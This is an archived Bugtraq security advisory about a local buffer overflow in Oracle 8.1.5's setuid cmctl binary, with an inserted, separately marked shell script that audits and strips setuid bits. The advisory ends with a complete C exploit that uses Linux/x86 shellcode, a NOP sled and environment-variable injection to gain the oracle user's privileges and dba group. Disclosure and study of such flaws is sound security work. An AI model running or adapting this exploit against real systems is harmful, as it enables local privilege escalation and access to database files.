Date:         Mon, 20 Nov 2000 12:57:42 +0100
From: Juan Manuel Pascual Escriba <pask@PLAZASITE.COM>
Subject:      vulnerability in Connection Manager Control binary in Oracle
To: BUGTRAQ@SECURITYFOCUS.COM

Hello Elias


        Could you make this advisory public? Oracle people don't send an
answer in 6 days. Please cut these lines.


                                                                Thanks




                      WWW.PLAZASITE.COM
                  System & Security Division

   Title:     Vulnerability in cmctl in Oracle 8.1.5
    Date:     13-11-2000
Platform:     Only tested in Linux, but can be exported to others.
  Impact:     Any user gain euid=oracle & egid=dba.
  Author:     Juan Manuel Pascual (pask@plazasite.com)
  Status:     Vendor Contacted. Details Below


OVERVIEW:

    cmctl is a Connection Manager Control binary


PROBLEM SUMMARY:

    There is a buffer overflow in cmctl that can be used by local
users to obtain the euid of the oracle user and the egid of dba. With the default
installation the oracle user owns all database files.


IMPACT:

    Any user with local access can gain euid=oracle and egid=dba.


SOLUTION:

    Maybe a chmod -s ;-)))).
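The fix suggested above (chmod -s) is easy to apply, but a practitioner will first want to know which binaries under the Oracle home actually carry the setuid or setgid bit, and to be able to re-check after the change. The following POSIX shell script is an added example written for this page; it is not part of the advisory or of Oracle's tooling. It assumes the usual ORACLE_HOME/bin layout, reports every setuid/setgid file there, and only strips the bits when explicitly asked to with a second argument of "apply".

```shell
#!/bin/sh
# Added example (not from the advisory): audit setuid/setgid binaries under an
# Oracle home and optionally strip the bits, which is the mitigation the
# advisory proposes for cmctl.
#
# Usage:
#   audit_setuid /path/to/ORACLE_HOME          # report only
#   audit_setuid /path/to/ORACLE_HOME apply    # report and chmod -s each hit

# Print the number of setuid/setgid regular files under $1/bin.
count_setuid_bins() {
    home="$1"
    [ -d "$home/bin" ] || { echo 0; return 0; }
    # -perm -4000: setuid bit set, -perm -2000: setgid bit set
    find "$home/bin" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | wc -l | tr -d ' '
}

# List each setuid/setgid file under $1/bin; with "$2" = apply, strip the bits.
audit_setuid() {
    home="$1"
    mode="${2:-report}"
    if [ ! -d "$home/bin" ]; then
        echo "no bin directory under $home" >&2
        return 2
    fi
    find "$home/bin" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while IFS= read -r f; do
        # ls -l shows the bit as 's' (or 'S') in the permission string
        printf 'setuid/setgid: %s  (%s)\n' "$f" "$(ls -l "$f" | cut -c1-10)"
        if [ "$mode" = "apply" ]; then
            # chmod -s clears both the setuid and the setgid bit
            chmod -s "$f" && printf 'stripped:      %s\n' "$f"
        fi
    done
    printf 'remaining setuid/setgid files: %s\n' "$(count_setuid_bins "$home")"
    return 0
}
```

Run the report mode first and confirm that nothing besides the binaries you expect shows up; a binary that is setuid for a reason (any Oracle component that must open files owned by the oracle user on behalf of other accounts) will stop working for non-oracle users once the bit is gone, so the change should be verified against the installation before it is applied broadly.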


STATUS:

    Vendor was contacted 13/11. No answers were received in the last
4 days.

----------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba            pask@plazasite.com



/*
Exploit Code for cmctl in Oracle 8.1.5 (8i) for Linux. I tested it on RH
6.2
and 6.1. It is possible to port it to other platforms.

If someone exports this to Sparc please tell me.

synopsis: buffer overflow in cmctl
Impact:   any user gains euid=oracle and egid=dba.


Dedicated to cmlc guys: juaroflin, oscar, ismak, blas, blackbas and
others.
Thanks for your patience and time.

Special Thanks to my favourite DBA. Xavi "de verdad como sois" Morales.
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen() was used without its header */

#define DEFAULT_OFFSET                    1
#define DEFAULT_BUFFER_SIZE             350
#define NOP                            0x90
/* cmctl is started through the shell so that $pakito is expanded from the
   environment and passed to it as an argument */
#define BINARY  "/usr/local/oracle8i/app/oracle/product/8.1.5/bin/cmctl echo $pakito"


/* Linux/x86 execve("/bin/sh") shellcode */
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Returns the current stack pointer (32-bit x86: the value is left in %eax) */
unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[]) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i;


  if (argc > 1) offset  = atoi(argv[1]);
        else
                {
                printf("Use ./cmctl_start Offset\n");
                exit(1);
                }


  buff = malloc(bsize);
  addr = get_sp() - offset;

  /* fill the whole buffer with the guessed return address */
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  /* turn the first half into a NOP sled and drop the shellcode in its middle */
  for (i = 0; i < bsize/2; i++)
    buff[i] = NOP;

  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';
  setenv("pakito",buff,1);

  system(BINARY);
  return 0;
}

--


                " In God We trust, Others We monitor "

        -------------------------------------------------------------
         Juan Manuel Pascual Escribá        Administrador de Sistemas
         PlazaSite S.A.                         c/ Tomás Bretón 32-38
         08950 Esplugues de Llobregat           (Barcelona),    SPAIN
         Ph: +34 93 3717398                       Fax: +34 93 3711968
         mob: 667591142                     Email: pask@plazasite.com
        -------------------------------------------------------------